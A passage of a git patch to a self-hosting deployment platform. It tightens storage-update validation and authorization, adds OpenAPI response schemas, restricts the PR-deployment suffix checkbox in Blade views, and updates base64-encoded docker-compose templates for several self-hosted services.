  resources in both shared and service file-storage views
- Replace condition `is_preview_deployments_enabled` with `!$isService`
  for PR suffix visibility in storages/show.blade.php
- Fix FileStorage::instantSave() to use authorize + syncData instead
  of delegating to submit(), preventing unintended side effects
- Add $this->validate() to Storages/Show::instantSave() before saving
- Add response content schemas to storages API OpenAPI annotations
- Add additionalProperties: false to storage update request schema
- Rewrite PreviewDeploymentBindMountTest with behavioral tests of
  addPreviewDeploymentSuffix instead of file-content inspection
---
 .../Api/ApplicationsController.php            |  32 ++-
 app/Livewire/Project/Service/FileStorage.php  |   6 +-
 app/Livewire/Project/Shared/Storages/Show.php |   3 +-
 openapi.json                                  |  38 ++-
 openapi.yaml                                  |  14 ++
 .../project/service/file-storage.blade.php    |  16 +-
 .../project/shared/storages/show.blade.php    |  20 +-
 templates/service-templates-latest.json       |  36 ++-
 templates/service-templates.json              |  36 ++-
 tests/Unit/PreviewDeploymentBindMountTest.php | 223 ++++++++++++------
 10 files changed, 314 insertions(+), 110 deletions(-)

diff --git a/app/Http/Controllers/Api/ApplicationsController.php b/app/Http/Controllers/Api/ApplicationsController.php
index 6521ef7ba..6188651a1 100644
--- a/app/Http/Controllers/Api/ApplicationsController.php
+++ b/app/Http/Controllers/Api/ApplicationsController.php
@@ -18,6 +18,7 @@
 use App\Rules\ValidGitBranch;
 use App\Rules\ValidGitRepositoryUrl;
 use App\Services\DockerImageParser;
+use Illuminate\Http\JsonResponse;
 use Illuminate\Http\Request;
 use Illuminate\Support\Facades\Http;
 use Illuminate\Support\Facades\Validator;
@@ -3944,6 +3945,12 @@ private function validateDataApplications(Request $request, Server $server)
             new OA\Response(
                 response: 200,
                 description: 'All storages by application UUID.',
+                content: new OA\JsonContent(
+                    properties: [
+                        new OA\Property(property: 'persistent_storages', type: 'array', items: new OA\Items(type: 'object')),
+                        new OA\Property(property: 'file_storages', type: 'array', items: new OA\Items(type: 'object')),
+                    ],
+                ),
             ),
             new OA\Response(
                 response: 401,
@@ -3959,7 +3966,7 @@ private function validateDataApplications(Request $request, Server $server)
             ),
         ]
     )]
-    public function storages(Request $request)
+    public function storages(Request $request): JsonResponse
     {
         $teamId = getTeamIdFromToken();
         if (is_null($teamId)) {
@@ -4022,6 +4029,7 @@ public function storages(Request $request)
                             'host_path' => ['type' => 'string', 'nullable' => true, 'description' => 'The host path (persistent only, not allowed for read-only storages).'],
                             'content' => ['type' => 'string', 'nullable' => true, 'description' => 'The file content (file only, not allowed for read-only storages).'],
                         ],
+                        additionalProperties: false,
                     ),
                 ),
             ],
@@ -4030,6 +4038,7 @@ public function storages(Request $request)
             new OA\Response(
                 response: 200,
                 description: 'Storage updated.',
+                content: new OA\JsonContent(type: 'object'),
             ),
             new OA\Response(
                 response: 401,
@@ -4043,9 +4052,13 @@ public function storages(Request $request)
                 response: 404,
                 ref: '#/components/responses/404',
             ),
+            new OA\Response(
+                response: 422,
+                ref: '#/components/responses/422',
+            ),
         ]
     )]
-    public function update_storage(Request $request)
+    public function update_storage(Request $request): JsonResponse
     {
         $teamId = getTeamIdFromToken();
 
@@ -4117,6 +4130,21 @@ public function update_storage(Request $request)
             ], 422);
         }
 
+        // Reject fields that don't apply to the given storage type
+        if (! $isReadOnly) {
+            $typeSpecificInvalidFields = $request->type === 'persistent'
+                ? array_intersect(['content'], array_keys($request->all()))
+                : array_intersect(['name', 'host_path'], array_keys($request->all()));
+
+            if (! empty($typeSpecificInvalidFields)) {
+                return response()->json([
+                    'message' => 'Validation failed.',
+                    'errors' => collect($typeSpecificInvalidFields)
+                        ->mapWithKeys(fn ($field) => [$field => "Field '{$field}' is not valid for type '{$request->type}'."]),
+                ], 422);
+            }
+        }
+
         // Always allowed
         if ($request->has('is_preview_suffix_enabled')) {
             $storage->is_preview_suffix_enabled = $request->is_preview_suffix_enabled;
diff --git a/app/Livewire/Project/Service/FileStorage.php b/app/Livewire/Project/Service/FileStorage.php
index 71da07eb0..844e37854 100644
--- a/app/Livewire/Project/Service/FileStorage.php
+++ b/app/Livewire/Project/Service/FileStorage.php
@@ -194,9 +194,11 @@ public function submit()
         }
     }
 
-    public function instantSave()
+    public function instantSave(): void
     {
-        $this->submit();
+        $this->authorize('update', $this->resource);
+        $this->syncData(true);
+        $this->dispatch('success', 'File updated.');
     }
 
     public function render()
diff --git a/app/Livewire/Project/Shared/Storages/Show.php b/app/Livewire/Project/Shared/Storages/Show.php
index 72b330845..eee5a0776 100644
--- a/app/Livewire/Project/Shared/Storages/Show.php
+++ b/app/Livewire/Project/Shared/Storages/Show.php
@@ -72,9 +72,10 @@ public function mount()
         $this->isReadOnly = $this->storage->shouldBeReadOnlyInUI();
     }
 
-    public function instantSave()
+    public function instantSave(): void
     {
         $this->authorize('update', $this->resource);
+        $this->validate();
 
         $this->syncData(true);
         $this->storage->save();
diff --git a/openapi.json b/openapi.json
index d1dadcaf0..5477420ab 100644
--- a/openapi.json
+++ b/openapi.json
@@ -3463,7 +3463,28 @@
                 ],
                 "responses": {
                     "200": {
-                        "description": "All storages by application UUID."
+                        "description": "All storages by application UUID.",
+                        "content": {
+                            "application\/json": {
+                                "schema": {
+                                    "properties": {
+                                        "persistent_storages": {
+                                            "type": "array",
+                                            "items": {
+                                                "type": "object"
+                                            }
+                                        },
+                                        "file_storages": {
+                                            "type": "array",
+                                            "items": {
+                                                "type": "object"
+                                            }
+                                        }
+                                    },
+                                    "type": "object"
+                                }
+                            }
+                        }
                     },
                     "401": {
                         "$ref": "#\/components\/responses\/401"
@@ -3545,14 +3566,22 @@
                                         "description": "The file content (file only, not allowed for read-only storages)."
                                     }
                                 },
-                                "type": "object"
+                                "type": "object",
+                                "additionalProperties": false
                             }
                         }
                     }
                 },
                 "responses": {
                     "200": {
-                        "description": "Storage updated."
+                        "description": "Storage updated.",
+                        "content": {
+                            "application\/json": {
+                                "schema": {
+                                    "type": "object"
+                                }
+                            }
+                        }
                     },
                     "401": {
                         "$ref": "#\/components\/responses\/401"
@@ -3562,6 +3591,9 @@
                     },
                     "404": {
                         "$ref": "#\/components\/responses\/404"
+                    },
+                    "422": {
+                        "$ref": "#\/components\/responses\/422"
                     }
                 },
                 "security": [
diff --git a/openapi.yaml b/openapi.yaml
index 74af3aa13..dd03f9c42 100644
--- a/openapi.yaml
+++ b/openapi.yaml
@@ -2188,6 +2188,13 @@ paths:
       responses:
         '200':
           description: 'All storages by application UUID.'
+          content:
+            application/json:
+              schema:
+                properties:
+                  persistent_storages: { type: array, items: { type: object } }
+                  file_storages: { type: array, items: { type: object } }
+                type: object
         '401':
           $ref: '#/components/responses/401'
         '400':
@@ -2246,15 +2253,22 @@ paths:
                   nullable: true
                   description: 'The file content (file only, not allowed for read-only storages).'
               type: object
+              additionalProperties: false
       responses:
         '200':
           description: 'Storage updated.'
+          content:
+            application/json:
+              schema:
+                type: object
         '401':
           $ref: '#/components/responses/401'
         '400':
           $ref: '#/components/responses/400'
         '404':
           $ref: '#/components/responses/404'
+        '422':
+          $ref: '#/components/responses/422'
       security:
         -
           bearerAuth: []
diff --git a/resources/views/livewire/project/service/file-storage.blade.php b/resources/views/livewire/project/service/file-storage.blade.php
index 24612098b..4bd88d761 100644
--- a/resources/views/livewire/project/service/file-storage.blade.php
+++ b/resources/views/livewire/project/service/file-storage.blade.php
@@ -15,13 +15,15 @@
                 <x-forms.input label="Destination Path" :value="$fileStorage->mount_path" readonly />
             </div>
         </div>
-        @can('update', $resource)
-            <div class="w-96">
-                <x-forms.checkbox instantSave label="Add suffix for PR deployments"
-                    id="isPreviewSuffixEnabled"
-                    helper="When enabled, a -pr-N suffix is added to this volume's path for preview deployments (e.g. ./scripts becomes ./scripts-pr-1). Disable this for volumes that contain shared config or scripts from your repository."></x-forms.checkbox>
-            </div>
-        @endcan
+        @if ($resource instanceof \App\Models\Application)
+            @can('update', $resource)
+                <div class="w-96">
+                    <x-forms.checkbox instantSave canGate="update" :canResource="$resource" label="Add suffix for PR deployments"
+                        id="isPreviewSuffixEnabled"
+                        helper="When enabled, a -pr-N suffix is added to this volume's path for preview deployments (e.g. ./scripts becomes ./scripts-pr-1). Disable this for volumes that contain shared config or scripts from your repository."></x-forms.checkbox>
+                </div>
+            @endcan
+        @endif
         <form wire:submit='submit' class="flex flex-col gap-2">
             @if (!$isReadOnly)
                 @can('update', $resource)
diff --git a/resources/views/livewire/project/shared/storages/show.blade.php b/resources/views/livewire/project/shared/storages/show.blade.php
index a3a486b92..7fc58000c 100644
--- a/resources/views/livewire/project/shared/storages/show.blade.php
+++ b/resources/views/livewire/project/shared/storages/show.blade.php
@@ -38,13 +38,15 @@
                     <x-forms.input id="mountPath" required readonly />
                 </div>
             @endif
-            @can('update', $resource)
-                <div class="w-96">
-                    <x-forms.checkbox instantSave label="Add suffix for PR deployments"
-                        id="isPreviewSuffixEnabled"
-                        helper="When enabled, a -pr-N suffix is added to this volume's name for preview deployments (e.g. myvolume becomes myvolume-pr-1). Disable this for volumes that should be shared between the main and preview deployments."></x-forms.checkbox>
-                </div>
-            @endcan
+            @if (!$isService)
+                @can('update', $resource)
+                    <div class="w-96">
+                        <x-forms.checkbox instantSave canGate="update" :canResource="$resource" label="Add suffix for PR deployments"
+                            id="isPreviewSuffixEnabled"
+                            helper="When enabled, a -pr-N suffix is added to this volume's name for preview deployments (e.g. myvolume becomes myvolume-pr-1). Disable this for volumes that should be shared between the main and preview deployments."></x-forms.checkbox>
+                    </div>
+                @endcan
+            @endif
         @else
             @can('update', $resource)
                 @if ($isFirst)
@@ -61,9 +63,9 @@
                         <x-forms.input id="mountPath" required />
                     </div>
                 @endif
-                @if (data_get($resource, 'settings.is_preview_deployments_enabled'))
+                @if (!$isService)
                     <div class="w-96">
-                        <x-forms.checkbox instantSave label="Add suffix for PR deployments"
+                        <x-forms.checkbox instantSave canGate="update" :canResource="$resource" label="Add suffix for PR deployments"
                             id="isPreviewSuffixEnabled"
                             helper="When enabled, a -pr-N suffix is added to this volume's name for preview deployments (e.g. myvolume becomes myvolume-pr-1). Disable this for volumes that should be shared between the main and preview deployments."></x-forms.checkbox>
                     </div>
diff --git a/templates/service-templates-latest.json b/templates/service-templates-latest.json
index bc05073d1..f22a2ab53 100644
--- a/templates/service-templates-latest.json
+++ b/templates/service-templates-latest.json
@@ -818,7 +818,7 @@
     "databasus": {
         "documentation": "https://databasus.com/installation?utm_source=coolify.io",
         "slogan": "Databasus is a free, open source and self-hosted tool to backup PostgreSQL, MySQL, and MongoDB.",
-        "compose": "c2VydmljZXM6CiAgZGF0YWJhc3VzOgogICAgaW1hZ2U6ICdkYXRhYmFzdXMvZGF0YWJhc3VzOnYyLjE4LjAnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX1VSTF9EQVRBQkFTVVNfNDAwNQogICAgdm9sdW1lczoKICAgICAgLSAnZGF0YWJhc3VzLWRhdGE6L2RhdGFiYXN1cy1kYXRhJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIHdnZXQKICAgICAgICAtICctcU8tJwogICAgICAgIC0gJ2h0dHA6Ly9sb2NhbGhvc3Q6NDAwNS9hcGkvdjEvc3lzdGVtL2hlYWx0aCcKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDEwcwogICAgICByZXRyaWVzOiA1Cg==",
+        "compose": "c2VydmljZXM6CiAgZGF0YWJhc3VzOgogICAgaW1hZ2U6ICdkYXRhYmFzdXMvZGF0YWJhc3VzOnYzLjE2LjInCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX1VSTF9EQVRBQkFTVVNfNDAwNQogICAgdm9sdW1lczoKICAgICAgLSAnZGF0YWJhc3VzLWRhdGE6L2RhdGFiYXN1cy1kYXRhJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIHdnZXQKICAgICAgICAtICctcU8tJwogICAgICAgIC0gJ2h0dHA6Ly9sb2NhbGhvc3Q6NDAwNS9hcGkvdjEvc3lzdGVtL2hlYWx0aCcKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDEwcwogICAgICByZXRyaWVzOiA1Cg==",
         "tags": [
             "postgres",
             "mysql",
@@ -1951,7 +1951,7 @@
     "heyform": {
         "documentation": "https://docs.heyform.net/open-source/self-hosting?utm_source=coolify.io",
         "slogan": "Allows anyone to create engaging conversational forms for surveys, questionnaires, quizzes, and polls. No coding skills required.",
-        "compose": "c2VydmljZXM6CiAgaGV5Zm9ybToKICAgIGltYWdlOiAnaGV5Zm9ybS9jb21tdW5pdHktZWRpdGlvbjpsYXRlc3QnCiAgICB2b2x1bWVzOgogICAgICAtICdoZXlmb3JtLWFzc2V0czovYXBwL3N0YXRpYy91cGxvYWQnCiAgICBkZXBlbmRzX29uOgogICAgICBtb25nbzoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICBrZXlkYjoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9VUkxfSEVZRk9STV84MDAwCiAgICAgIC0gJ0FQUF9IT01FUEFHRV9VUkw9JHtTRVJWSUNFX1VSTF9IRVlGT1JNfScKICAgICAgLSAnU0VTU0lPTl9LRVk9JHtTRVJWSUNFX0JBU0U2NF82NF9TRVNTSU9OfScKICAgICAgLSAnRk9STV9FTkNSWVBUSU9OX0tFWT0ke1NFUlZJQ0VfQkFTRTY0XzY0X0ZPUk19JwogICAgICAtICdNT05HT19VUkk9bW9uZ29kYjovL21vbmdvOjI3MDE3L2hleWZvcm0nCiAgICAgIC0gUkVESVNfSE9TVD1rZXlkYgogICAgICAtIFJFRElTX1BPUlQ9NjM3OQogICAgICAtICdSRURJU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfS0VZREJ9JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICd3Z2V0IC1xTy0gaHR0cDovLzEyNy4wLjAuMTo4MDAwIHx8IGV4aXQgMScKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDMKICBtb25nbzoKICAgIGltYWdlOiAncGVyY29uYS9wZXJjb25hLXNlcnZlci1tb25nb2RiOmxhdGVzdCcKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2hleWZvcm0tbW9uZ28tZGF0YTovZGF0YS9kYicKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAiZWNobyAnb2snID4gL2Rldi9udWxsIDI+JjEiCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAxMAogICAgICBzdGFydF9wZXJpb2Q6IDVzCiAga2V5ZGI6CiAgICBpbWFnZTogJ2VxYWxwaGEva2V5ZGI6bGF0ZXN0JwogICAgY29tbWFuZDogJ2tleWRiLXNlcnZlciAtLWFwcGVuZG9ubHkgeWVzJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ0tFWURCX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9LRVlEQn0nCiAgICB2b2x1bWVzOgogICAgICAtICdoZXlmb3JtLWtleWRiLWRhdGE6L2RhdGEnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0ga2V5ZGItY2xpCiAgICAgICAgLSAnLS1wYXNzJwogICAgICAgIC0gJyR7U0VSVklDRV9QQVNTV09SRF9LRVlEQn0nCiAgICAgICAgLSBwaW5nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAxMAogICAgICBzdGFydF9wZXJpb2Q6IDVzCg==",
+        "compose": "c2VydmljZXM6CiAgaGV5Zm9ybToKICAgIGltYWdlOiAnaGV5Zm9ybS9jb21tdW5pdHktZWRpdGlvbjpsYXRlc3QnCiAgICB2b2x1bWVzOgogICAgICAtICdoZXlmb3JtLWFzc2V0czovYXBwL3N0YXRpYy91cGxvYWQnCiAgICBkZXBlbmRzX29uOgogICAgICBtb25nbzoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICBrZXlkYjoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9VUkxfSEVZRk9STV85MTU3CiAgICAgIC0gJ0FQUF9IT01FUEFHRV9VUkw9JHtTRVJWSUNFX1VSTF9IRVlGT1JNfScKICAgICAgLSAnU0VTU0lPTl9LRVk9JHtTRVJWSUNFX0JBU0U2NF82NF9TRVNTSU9OfScKICAgICAgLSAnRk9STV9FTkNSWVBUSU9OX0tFWT0ke1NFUlZJQ0VfQkFTRTY0XzY0X0ZPUk19JwogICAgICAtICdNT05HT19VUkk9bW9uZ29kYjovL21vbmdvOjI3MDE3L2hleWZvcm0nCiAgICAgIC0gUkVESVNfSE9TVD1rZXlkYgogICAgICAtIFJFRElTX1BPUlQ9NjM3OQogICAgICAtICdSRURJU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfS0VZREJ9JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICd3Z2V0IC1xTy0gaHR0cDovLzEyNy4wLjAuMTo5MTU3IHx8IGV4aXQgMScKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDMKICBtb25nbzoKICAgIGltYWdlOiAncGVyY29uYS9wZXJjb25hLXNlcnZlci1tb25nb2RiOmxhdGVzdCcKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2hleWZvcm0tbW9uZ28tZGF0YTovZGF0YS9kYicKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAiZWNobyAnb2snID4gL2Rldi9udWxsIDI+JjEiCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAxMAogICAgICBzdGFydF9wZXJpb2Q6IDVzCiAga2V5ZGI6CiAgICBpbWFnZTogJ2VxYWxwaGEva2V5ZGI6bGF0ZXN0JwogICAgY29tbWFuZDogJ2tleWRiLXNlcnZlciAtLWFwcGVuZG9ubHkgeWVzJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ0tFWURCX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9LRVlEQn0nCiAgICB2b2x1bWVzOgogICAgICAtICdoZXlmb3JtLWtleWRiLWRhdGE6L2RhdGEnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0ga2V5ZGItY2xpCiAgICAgICAgLSAnLS1wYXNzJwogICAgICAgIC0gJyR7U0VSVklDRV9QQVNTV09SRF9LRVlEQn0nCiAgICAgICAgLSBwaW5nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAxMAogICAgICBzdGFydF9wZXJpb2Q6IDVzCg==",
         "tags": [
             "form",
             "builder",
@@ -1965,7 +1965,7 @@
         "category": "productivity",
         "logo": "svgs/heyform.svg",
         "minversion": "0.0.0",
-        "port": "8000"
+        "port": "9157"
     },
     "homarr": {
         "documentation": "https://homarr.dev?utm_source=coolify.io",
@@ -2041,6 +2041,21 @@
         "minversion": "0.0.0",
         "port": "80"
     },
+    "imgcompress": {
+        "documentation": "https://imgcompress.karimzouine.com?utm_source=coolify.io",
+        "slogan": "Offline image compression, conversion, and AI background removal for Docker homelabs.",
+        "compose": "c2VydmljZXM6CiAgaW1nY29tcHJlc3M6CiAgICBpbWFnZTogJ2thcmltejEvaW1nY29tcHJlc3M6MC42LjAnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX1VSTF9JTUdDT01QUkVTU181MDAwCiAgICAgIC0gJ0RJU0FCTEVfTE9HTz0ke0RJU0FCTEVfTE9HTzotZmFsc2V9JwogICAgICAtICdESVNBQkxFX1NUT1JBR0VfTUFOQUdFTUVOVD0ke0RJU0FCTEVfU1RPUkFHRV9NQU5BR0VNRU5UOi1mYWxzZX0nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gY3VybAogICAgICAgIC0gJy1mJwogICAgICAgIC0gJ2h0dHA6Ly8xMjcuMC4wLjE6NTAwMCcKICAgICAgaW50ZXJ2YWw6IDMwcwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogMwo=",
+        "tags": [
+            "compress",
+            "photo",
+            "server",
+            "metadata"
+        ],
+        "category": "media",
+        "logo": "svgs/imgcompress.png",
+        "minversion": "0.0.0",
+        "port": "5000"
+    },
     "immich": {
         "documentation": "https://immich.app/docs/overview/introduction?utm_source=coolify.io",
         "slogan": "Self-hosted photo and video management solution.",
@@ -2417,6 +2432,19 @@
         "minversion": "0.0.0",
         "port": "3000"
     },
+    "librespeed": {
+        "documentation": "https://github.com/librespeed/speedtest?utm_source=coolify.io",
+        "slogan": "Self-hosted lightweight Speed Test.",
+        "compose": "c2VydmljZXM6CiAgbGlicmVzcGVlZDoKICAgIGNvbnRhaW5lcl9uYW1lOiBsaWJyZXNwZWVkCiAgICBpbWFnZTogJ2doY3IuaW8vbGlicmVzcGVlZC9zcGVlZHRlc3Q6bGF0ZXN0JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9VUkxfTElCUkVTUEVFRF84MgogICAgICAtIE1PREU9c3RhbmRhbG9uZQogICAgICAtIFRFTEVNRVRSWT1mYWxzZQogICAgICAtIERJU1RBTkNFPWttCiAgICAgIC0gV0VCUE9SVD04MgogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6ICdjdXJsIDEyNy4wLjAuMTo4MiB8fCBleGl0IDEnCiAgICAgIHRpbWVvdXQ6IDFzCiAgICAgIGludGVydmFsOiAxbTBzCiAgICAgIHJldHJpZXM6IDEK",
+        "tags": [
+            "speedtest",
+            "internet-speed"
+        ],
+        "category": "devtools",
+        "logo": "svgs/librespeed.png",
+        "minversion": "0.0.0",
+        "port": "82"
+    },
     "libretranslate": {
         "documentation": "https://libretranslate.com/docs/?utm_source=coolify.io",
         "slogan": "Free and open-source machine translation API, entirely self-hosted.",
@@ -4099,7 +4127,7 @@
     "seaweedfs": {
         "documentation": "https://github.com/seaweedfs/seaweedfs?utm_source=coolify.io",
         "slogan": "SeaweedFS is a simple and highly scalable distributed file system. Compatible with S3, with an admin web interface.",
-        "compose": "c2VydmljZXM6CiAgc2Vhd2VlZGZzLW1hc3RlcjoKICAgIGltYWdlOiAnY2hyaXNsdXNmL3NlYXdlZWRmczo0LjA1JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9VUkxfUzNfODMzMwogICAgICAtICdBV1NfQUNDRVNTX0tFWV9JRD0ke1NFUlZJQ0VfVVNFUl9TM30nCiAgICAgIC0gJ0FXU19TRUNSRVRfQUNDRVNTX0tFWT0ke1NFUlZJQ0VfUEFTU1dPUkRfUzN9JwogICAgdm9sdW1lczoKICAgICAgLSAnc2Vhd2VlZGZzLXMzLWRhdGE6L2RhdGEnCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL2Jhc2UtY29uZmlnLmpzb24KICAgICAgICB0YXJnZXQ6IC9iYXNlLWNvbmZpZy5qc29uCiAgICAgICAgY29udGVudDogIntcbiAgXCJpZGVudGl0aWVzXCI6IFtcbiAgICB7XG4gICAgICBcIm5hbWVcIjogXCJhbm9ueW1vdXNcIixcbiAgICAgIFwiYWN0aW9uc1wiOiBbXG4gICAgICAgIFwiUmVhZFwiXG4gICAgICBdXG4gICAgfSxcbiAgICB7XG4gICAgICBcIm5hbWVcIjogXCJhZG1pblwiLFxuICAgICAgXCJjcmVkZW50aWFsc1wiOiBbXG4gICAgICAgIHtcbiAgICAgICAgICBcImFjY2Vzc0tleVwiOiBcImVudjpBV1NfQUNDRVNTX0tFWV9JRFwiLFxuICAgICAgICAgIFwic2VjcmV0S2V5XCI6IFwiZW52OkFXU19TRUNSRVRfQUNDRVNTX0tFWVwiXG4gICAgICAgIH1cbiAgICAgIF0sXG4gICAgICBcImFjdGlvbnNcIjogW1xuICAgICAgICBcIkFkbWluXCIsXG4gICAgICAgIFwiUmVhZFwiLFxuICAgICAgICBcIlJlYWRBY3BcIixcbiAgICAgICAgXCJMaXN0XCIsXG4gICAgICAgIFwiVGFnZ2luZ1wiLFxuICAgICAgICBcIldyaXRlXCIsXG4gICAgICAgIFwiV3JpdGVBY3BcIlxuICAgICAgXVxuICAgIH1cbiAgXVxufVxuIgogICAgZW50cnlwb2ludDogInNoIC1jICdcXFxuc2VkIFwicy9lbnY6QVdTX0FDQ0VTU19LRVlfSUQvJEFXU19BQ0NFU1NfS0VZX0lEL2dcIiAvYmFzZS1jb25maWcuanNvbiA+IC9iYXNlMS1jb25maWcuanNvbjsgXFxcbnNlZCBcInMvZW52OkFXU19TRUNSRVRfQUNDRVNTX0tFWS8kQVdTX1NFQ1JFVF9BQ0NFU1NfS0VZL2dcIiAvYmFzZTEtY29uZmlnLmpzb24gPiAvY29uZmlnLmpzb247IFxcXG53ZWVkIHNlcnZlciAtZGlyPS9kYXRhIC1tYXN0ZXIucG9ydD05MzMzIC1zMyAtczMucG9ydD04MzMzIC1zMy5jb25maWc9L2NvbmZpZy5qc29uXFxcbidcbiIKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnd2dldCAtLXNwaWRlciAtcSBodHRwOi8vMC4wLjAuMDo4MzMzOyBbICQkPyAtbGUgOCBdJwogICAgICBpbnRlcnZhbDogMTBzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDEwCiAgc2Vhd2VlZGZzLWFkbWluOgogICAgaW1hZ2U6ICdjaHJpc2x1c2Yvc2Vhd2VlZGZzOjQuMDUnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX1VSTF9BRE1JTl8yMzY0NgogICAgICAtICdTRUFXRUVEX1VTRVJfQURNSU49JHtTRVJWSUNFX1VTRVJfQURNSU59JwogICAgICAtICdTRUFXRUVEX1BBU1NXT1JEX0FETUlOPSR7U0VSVklDRV9QQVNTV09SRF9BRE1JTn0nCiAgICBjb21tYW5kOgogICAgICAtIGFkbWluCiAgICAgIC0gJy1tYXN0ZXI9c2Vhd2VlZGZzLW1hc3Rlcjo5MzMzJwogICAgICAtICctYWRtaW5Vc2VyPSR7U0VBV0VFRF9VU0VSX0FETUlOfScKICAgICAgLSAnLWFkbWluUGFzc3dvcmQ9JHtTRUFXRUVEX1BBU1NXT1JEX0FETUlOfScKICAgICAgLSAnLXBvcnQ9MjM2NDYnCiAgICAgIC0gJy1kYXRhRGlyPS9kYXRhJwogICAgdm9sdW1lczoKICAgICAgLSAnc2Vhd2VlZGZzLWFkbWluLWRhdGE6L2RhdGEnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3dnZXQgLS1zcGlkZXIgLXEgaHR0cDovLzAuMC4wLjA6MjM2NDY7IFsgJCQ/IC1sZSA4IF0nCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogMTAKICAgIGRlcGVuZHNfb246CiAgICAgIHNlYXdlZWRmcy1tYXN0ZXI6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkK",
